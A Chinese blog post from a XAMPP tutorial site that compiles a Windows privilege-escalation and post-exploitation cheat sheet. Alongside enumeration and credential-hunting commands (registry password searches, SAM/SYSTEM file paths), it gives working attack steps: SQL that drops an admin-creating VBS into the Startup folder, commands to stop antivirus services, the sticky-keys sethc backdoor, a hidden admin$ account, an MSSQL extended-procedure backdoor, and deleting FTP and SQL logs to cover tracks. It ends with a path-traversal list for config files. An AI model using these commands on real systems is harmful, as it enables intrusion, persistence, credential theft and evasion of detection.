最新消息:XAMPP默认安装之后是很不安全的,我们只需要点击左方菜单的 "安全"选项,按照向导操作即可完成安全设置。

xampp:Win提权思路,方法,工具(小总结)

XAMPP教程 中文小张 153浏览 0评论

命令了解操作系统类型和架构?它是否缺少任何补丁?

systeminfo

wmic qfe

环境变量有什么有趣的地方吗?域控制器在LOGONSERVER?

set

Get-ChildItem Env: | ft Key,Value

有没有其他连接的驱动器?

net use

wmic logicaldisk get caption,description,providername

Get-PSDrive | where {$_.Provider -like “Microsoft.PowerShell.Core\FileSystem”}| ft Name,Root

 

用户,你是谁?

whoami

echo %USERNAME%

$env:UserName

系统上有哪些用户?任何旧的用户配置文件没有被清理掉?

net users

dir /b /ad “C:\Users\”

dir /b /ad “C:\Documents and Settings\” # Windows XP and below

Get-LocalUser | ft Name,Enabled,LastLogon

Get-ChildItem C:\Users -Force | select Name

是否有其他人登录?

qwinsta

 

系统上有哪些用户组?

net localgroup

Get-LocalGroup | ft Name

在管理员组中有哪些用户?

net localgroup Administrators

Get-LocalGroupMember Administrators | ft Name, PrincipalSource

用户自动登录对应的注册表中有些什么内容?

reg query “HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon” 2>nul | findstr “DefaultUserName DefaultDomainName DefaultPassword”

Get-ItemProperty -Path ‘Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon’ | select “Default*”

Credential Manager中有什么有趣的东西?

cmdkey /list

我们可以访问SAM和SYSTEM文件吗?

%SYSTEMROOT%\repair\SAM

%SYSTEMROOT%\System32\config\RegBack\SAM

%SYSTEMROOT%\System32\config\SAM

%SYSTEMROOT%\repair\system

%SYSTEMROOT%\System32\config\SYSTEM

%SYSTEMROOT%\System32\config\RegBack\system

程序,进程和服务,系统都安装了些什么软件?

dir /a “C:\Program Files”

dir /a “C:\Program Files (x86)”

reg query HKEY_LOCAL_MACHINE\SOFTWARE

Get-ChildItem ‘C:\Program Files’, ‘C:\Program Files (x86)’ | ft Parent,Name,LastWriteTime

Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name

有没有权限设置的比较脆弱的文件夹或文件的权限?

在程序文件夹中(Program Folders)有哪些文件或文件夹赋予了所有人(Everyone)或用户(User)的完全权限?

icacls “C:\Program Files\*” 2>nul | findstr “(F)” | findstr “Everyone”

icacls “C:\Program Files (x86)\*” 2>nul | findstr “(F)” | findstr “Everyone”

icacls “C:\Program Files\*” 2>nul | findstr “(F)” | findstr “BUILTIN\Users”

icacls “C:\Program Files (x86)\*” 2>nul | findstr “(F)” | findstr “BUILTIN\Users”

修改程序文件夹(Program Folders)中的所有人(Everyone)或用户(User)的权限?

icacls “C:\Program Files\*” 2>nul | findstr “(M)” | findstr “Everyone”

icacls “C:\Program Files (x86)\*” 2>nul | findstr “(M)” | findstr “Everyone”

icacls “C:\Program Files\*” 2>nul | findstr “(M)” | findstr “BUILTIN\Users”

icacls “C:\Program Files (x86)\*” 2>nul | findstr “(M)” | findstr “BUILTIN\Users”

Get-ChildItem ‘C:\Program Files\*’,'C:\Program Files (x86)\*’ | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match ‘Everyone’} } catch {}}

Get-ChildItem ‘C:\Program Files\*’,'C:\Program Files (x86)\*’ | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match ‘BUILTIN\Users’} } catch {}}

你也可以上传Sysinternals中的accesschk来检查可写文件夹和文件。

accesschk.exe -qwsu “Everyone” *

accesschk.exe -qwsu “Authenticated Users” *

accesschk.exe -qwsu “Users”

系统上正在运行的进程/服务有哪些?有没有暴露的内部服务?如果是这样,我们可以打开它吗?请参阅附录中的端口转发。

tasklist /svc

tasklist /v

net start

sc query

Get-Process | ft ProcessName,Id

Get-Service

 

是否存在任何脆弱的服务权限?我们可以重新配置什么吗?你可以再次上传accesschk来检查权限。

accesschk.exe -uwcqv “Everyone” *

accesschk.exe -uwcqv “Authenticated Users” *

accesschk.exe -uwcqv “Users” *

有没有引用的服务路径?

wmic service get name,displayname,pathname,startmode 2>nul |findstr /i “Auto” 2>nul |findstr /i /v “C:\Windows\\” 2>nul |findstr /i /v “”"

是否设置了计划任务?任何自定义实现的计划任务?

schtasks /query /fo LIST 2>nul | findstr TaskName

dir C:\windows\tasks

Get-ScheduledTask | ft TaskName, State

系统启动时都运行了些什么?

wmic startup get caption,command

reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run

reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce

reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run

reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce

dir “C:\Documents and Settings\All Users\Start Menu\Programs\Startup”

dir “C:\Documents and Settings\%username%\Start Menu\Programs\Startup

Get-CimInstace Win32_StartupCommand | select Name, command, Location, User | fl

Get-ItemProperty -Path ‘Registry::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run’

Get-ItemProperty -Path ‘Registry::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce’

Get-ItemProperty -Path ‘Registry::HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run’

Get-ItemProperty -Path ‘Registry::HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce’

Get-ChildItem “C:\Users\All Users\Start Menu\Programs\Startup”

Get-ChildItem “C:\Users\$env:USERNAME\Start Menu\Programs\Startup”

AlwaysInstallElevated是否启用?我没有跑过这个,但没有伤害检查。

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

网络连接到了哪一块网卡?是否有多个网络?

ipconfig /all

Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address

我们有哪些网络路线?

route print

Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex

ARP缓存中有什么?

arp -a

Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State

有连接到其他主机的网络连接?

netstat -ano

hosts文件中的有什么东西?

 C:\WINDOWS\System32\drivers\etc\hosts

防火墙是否打开?如果是又是怎样配置的?

netsh firewall show state

netsh firewall show config

netsh advfirewall firewall show rule name=all

netsh advfirewall export “firewall.txt”

任何其他趣的接口配置?

netsh dump

有没有SNMP配置?

reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s

Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurs

有趣的文件和敏感信息

这部分内容的命令输出可能有点杂乱,所以你可能想把命令的输出重定向到txt文件中进行审查和解析。

在注册表中是否有任何密码?

reg query HKCU /f password /t REG_SZ /s

reg query HKLM /f password /t REG_SZ /s

查看是否存在没有清理掉的sysprep或unattended文件?

dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul

Get-Childitem –Path C:\ -Include *unattend*,*sysprep* -File -Recurse -ErrorAction SilentlyContinue | where {($_.Name -like “*.xml” -or $_.Name -like “*.txt” -or $_.Name -like “*.ini”)}

如果服务器是IIS网络服务器,那么inetpub中有什么?以及任何隐藏的目录?web.config文件?

dir /a C:\inetpub\

dir /s web.config

C:\Windows\System32\inetsrv\config\applicationHost.config

Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue

在IIS日志目录中有些什么文件?

C:\inetpub\logs\LogFiles\W3SVC1\u_ex[YYMMDD].log

C:\inetpub\logs\LogFiles\W3SVC2\u_ex[YYMMDD].log

C:\inetpub\logs\LogFiles\FTPSVC1\u_ex[YYMMDD].log

C:\inetpub\logs\LogFiles\FTPSVC2\u_ex[YYMMDD].log

是否安装了XAMPP,Apache或PHP?任何有XAMPP,Apache或PHP配置文件?

dir /s php.ini httpd.conf httpd-xampp.conf my.ini my.cnf

Get-Childitem –Path C:\ -Include php.ini,httpd.conf,httpd-xampp.conf,my.ini,my.cnf -File -Recurse -ErrorAction SilentlyContinue

系统中是否存在任何Apache网络日志?

dir /s access.log error.log

Get-Childitem –Path C:\ -Include access.log,error.log -File -Recurse -ErrorAction SilentlyContinue

系统中是否任何有趣的文件?可能在用户目录(桌面,文档等)?

dir /s *pass* == *vnc* == *.config* 2>nulGet-Childitem –Path C:\Users\ -Include *password*,*vnc*,*.config -File -Recurse -ErrorAction SilentlyContinue

系统中是否有包含密码的文件?

findstr /si password *.xml *.ini *.txt *.config 2>nul

Get-ChildItem C:\* -include *.xml,*.ini,*.txt,*.config -Recurse -ErrorAction SilentlyContinue | Select-String -Pattern “password”

cmd 下操作VPN 相关知识,资料:

#允许administrator拨入该VPN:

netsh ras set user administrator permit

#禁止administrator拨入该VPN:

netsh ras set user administrator deny

#查看哪些用户可以拨入VPN:

netsh ras show user

#查看VPN分配IP的方式:

netsh ras ip show config

#使用地址池的方式分配IP:

netsh ras ip set addrassign method = pool

#地址池的范围是从192.168.3.1到192.168.3.254:

netsh ras ip add range from = 192.168.3.1 to = 192.168.3.254

Cmd、Dos 命令行下添加 SQL 用户的方法:

需要有管理员权限,在命令下先建立一个“c:\test.qry”文件,内容如下:

exec master.dbo.sp_addlogin test,123

EXEC sp_addsrvrolemember ‘test, ‘sysadmin’

然后在DOS下执行:cmd.exe /c isql -E /U alma /P /i c:\test.qry

另类的加用户方法:

在删掉了 net.exe 和不用 adsi 之外,新的加用户的方法。代码如下

js:

var o=new ActiveXObject( “Shell.Users” );

z=o.create(“test”) ;

z.changePassword(“123456″,”")

z.setting(“AccountType”)=3;

vbs:

view source

Set o=CreateObject( “Shell.Users” )

Set z=o.create(“test”)

z.changePassword “123456″,”"

z.setting(“AccountType”)=3

Cmd 访问控制权限控制:

命令如下:

cacls c: /e /t /g everyone:F           #c盘everyone权限

cacls “目录” /d everyone               #everyone不可读,包括admin

备注:

反制方法,在文件夹安全设置里将 Everyone 设定为不可读,如果没有安全性选项:工具 – 文件夹选项 – 使用简单的共享去掉即可

3389 相关,以下配合PR更好:

a、防火墙TCP/IP筛选.(关闭:net stop policyagent & net stop sharedaccess)

b、内网环境(lcx.exe)

c、终端服务器超出了最大允许连接(XP 运行:mstsc /admin;2003 运行:mstsc /console)

1.查询终端端口:

REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server\WinStations\RDP-Tcp /v PortNumbe

2.开启XP&2003终端服务:

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

3.更改终端端口为2008(十六进制为:0x7d8):

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x7d8 /f

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x7D8 /f

4.取消xp&2003系统防火墙对终端服务的限制及IP连接的限制:

REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled :@ xpsp2res.dll,-22009 /f

create table a (cmd text);

insert into a values (“set wshshell=createobject (“”wscript.shell”")”);

insert into a values (“a=wshshell.run (“”cmd.exe /c net user admin admin /add”",0)”);

insert into a values (“b=wshshell.run (“”cmd.exe /c net localgroup administrators admin /add”",0)”);

select * from a into outfile “C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs”;

BS马的PortMap功能,类似LCX做转发。若果支持ASPX,用这个转发会隐蔽点。(注:一直忽略了在偏僻角落的那个功能)

关闭常见杀软(把杀软所在的文件的所有权限去掉):

处理变态诺顿企业版:

net stop “Symantec AntiVirus” /y

net stop “Symantec AntiVirus Definition Watcher” /y

net stop “Symantec Event Manager” /y

net stop “System Event Notification” /y

net stop “Symantec Settings Manager” /y

麦咖啡:

net stop “McAfee McShield”

Symantec病毒日志:

C:\Documents and Settings\All Users\Application Data\Symantec\Symantec Endpoint Protection\Logs

Symantec病毒备份:

C:\Documents and Settings\All Users\Application Data\Symantec\Symantec Endpoint Protection\Quarantine

Nod32病毒备份:

C:\Docume~1\Administrator\Local Settings\Application Data\ESET\ESET NOD32 Antivirus\Quarantine

Nod32移除密码保护

删除“HKEY_LOCAL_MACHINE\SOFTWARE\ESET\ESET Security\CurrentVersion\Info\PackageID”即

安装5次shift后门,沾滞键后门,替换SHIFT后门

5次SHIFT,沾滞键后门

copy %systemroot%\system32\sethc.exe %systemroot%\system32\dllcache\sethc1.exe

copy %systemroot%\system32\cmd.exe %systemroot%\system32\dllcache\sethc.exe /y

copy %systemroot%\system32\cmd.exe %systemroot%\system32\sethc.exe /y

替换SHIFT后门:

attrib c:\windows\system32\sethc.exe -h -r -s

attrib c:\windows\system32\dllcache\sethc.exe -h -r -s

del c:\windows\system32\sethc.exe

copy c:\wdows\explorer.exe c:\windows\system32\sethc.exe

copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe

attrib c:\windows\system32\sethc.exe +h +r +s

attrib c:\windows\system32\dllcache\sethc.exe +h +r +s

添加隐藏系统账号:

1、执行命令:

“net user admin$ 123456 /add&net localgroup administrators admin$ /add”。

2、导出注册表SAM下用户的两个键值。

3、在用户管理界面里的 admin$ 删除,然后把备份的注册表导回去

4、利用 Hacker Defender 把相关用户注册表隐藏。

安装 MSSQL 扩展后门:

USE master;

EXEC sp_addextendedproc ‘xp_helpsystem’, ‘xp_helpsystem.dll’;

GRANT exec On xp_helpsystem TO public;

处理服务器MSFTP日志:

在“C:\WINNT\system32\LogFiles\MSFTPSVC1\”下有 ex011120.log / ex011121.log / ex011124.log 三个文件,直接删除 ex0111124.log 不成功,显示“原文件…正在使用”

当然可以直接删除“ex011120.log / ex011121.log”。然后用记事本打开“ex0111124.log”,删除里面的一些内容后,保存,覆盖退出,成功。

当停止“msftpsvc”服务后可直接删除“ex011124.log”。

MSSQL查询分析器连接记录清除:

MSSQL 2000 位于注册表如下:

URRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers

找到接接过的信息删除。

MSSQL 2005 是在:

C:\Documents and Settings\\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat

各种网站的配置文件相对路径大全:

/config.php

../../config.php

../config.php

../../../config.php

/config.inc.php

./config.inc.php

../../config.inc.php

../config.inc.php

../../../config.inc.php

/conn.php

./conn.php

../../conn.php

../conn.php

../../../conn.php

/conn.asp

./conn.asp

../../conn.asp

../conn.asp

../../../conn.asp

/config.inc.php

./config.inc.php

../../config.inc.php

../config.inc.php

../../../config.inc.php

/config/config.php

../../config/config.php

../config/config.php

../../../config/config.php

/config/config.inc.php

./config/config.inc.php

../../config/config.inc.php

../config/config.inc.php

../../../config/config.inc.php

/config/conn.php

./config/conn.php

../../config/conn.php

../config/conn.php

../../../config/conn.php

/config/conn.asp

./config/conn.asp

../../config/conn.asp

../config/conn.asp

../../../config/conn.asp

/config/config.inc.php

./config/config.inc.php

../../config/config.inc.php

../config/config.inc.php

../../../config/config.inc.php

/data/config.php

../../data/config.php

../data/config.php

../../../data/config.php

/data/config.inc.php

./data/config.inc.php

../../data/config.inc.php

../data/config.inc.php

../../../data/config.inc.php

/data/conn.php

./data/conn.php

../../data/conn.php

../data/conn.php

../../../data/conn.php

/data/conn.asp

./data/conn.asp

../../data/conn.asp

../data/conn.asp

../../../data/conn.asp

/data/config.inc.php

./data/config.inc.php

../../data/config.inc.php

../data/config.inc.php

../../../data/config.inc.php

/include/config.php

../../include/config.php

../include/config.php

../../../include/config.php

/include/config.inc.php

./include/config.inc.php

../../include/config.inc.php

../include/config.inc.php

../../../include/config.inc.php

/include/conn.php

./include/conn.php

../../include/conn.php

../include/conn.php

../../../include/conn.php

/include/conn.asp

./include/conn.asp

../../include/conn.asp

../include/conn.asp

../../../include/conn.asp

/include/config.inc.php

./include/config.inc.php

../../include/config.inc.php

../include/config.inc.php

../../../include/config.inc.php

/inc/config.php

../../inc/config.php

../inc/config.php

../../../inc/config.php

/inc/config.inc.php

./inc/config.inc.php

../../inc/config.inc.php

../inc/config.inc.php

../../../inc/config.inc.php

/inc/conn.php

./inc/conn.php

../../inc/conn.php

../inc/conn.php

../../../inc/conn.php

/inc/conn.asp

./inc/conn.asp

../../inc/conn.asp

../inc/conn.asp

../../../inc/conn.asp

/inc/config.inc.php

./inc/config.inc.php

../../inc/config.inc.php

../inc/config.inc.php

../../../inc/config.inc.php

/index.php

./index.php

../../index.php

../index.php

../../../index.php

/index.asp

./index.asp

../../index.asp

../index.asp

../../../index.asp

转载请注明:XAMPP中文组官网 » xampp:Win提权思路,方法,工具(小总结)